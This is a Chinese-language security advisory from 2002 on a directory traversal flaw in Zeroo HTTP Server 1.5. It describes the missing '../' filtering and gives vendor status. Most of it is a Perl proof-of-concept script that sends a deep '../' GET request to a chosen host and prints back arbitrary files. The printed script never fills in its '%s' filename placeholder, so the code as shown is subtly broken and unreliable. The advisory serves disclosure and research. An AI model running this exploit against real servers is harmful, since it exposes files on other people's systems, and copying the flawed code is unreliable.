Zeroo HTTP Server远程目录遍历漏洞
发布日期:2002-12-03
更新日期:2002-12-11
受影响系统:Zeroo HTTP Server 1.5
描述:
BUGTRAQ ID:
6308
Zeroo HTTP Server是一款简单快速的WEB服务器程序。
Zeroo HTTP对用户提交的恶意WEB请求缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限查看系统上任意文件内容。
由于Zeroo不正确过滤WEB请求,攻击者可以提交包含多个'../'的WEB请求给Zeroo服务程序,可绕过WEB ROOT目录的限制,以WEB权限查看系统上任意文件内容。造成敏感信息泄露。
<*来源:mattmurphy (
mattmurphy@kc.rr.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103803494825054&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
mattmurphy (
mattmurphy@kc.rr.com)提供了如下测试脚本:
#!/usr/bin/perl
use IO::Socket;
$pkt = "GET /../../../../../../../../../../../../../../../../../../../../%s
HTTP/1.0\r\n\r\n";
if (@ARGV < 2 || @ARGV > 3) {
print STDOUT "Usage: perl $0 [filename] [host] [port=80]";
exit;
}
if (@ARGV==3) {
$port=$ARGV[2];
} else {
$port=80;
}
$f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=>$port);
if (!defined($f)) {
$err=sprintf("Cannot connect to %s on port %d",$ARGV[1],$port);
print STDOUT $err;
exit;
}
$f->autoflush(1);
print $f $pkt;
while (defined($line = <$f>)) {
print STDOUT $line;
}
undef $f;
建议:
厂商补丁:
Zeroo
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://lonerunner.cfxweb.net/浏览次数:2842
严重程度:0(网友投票)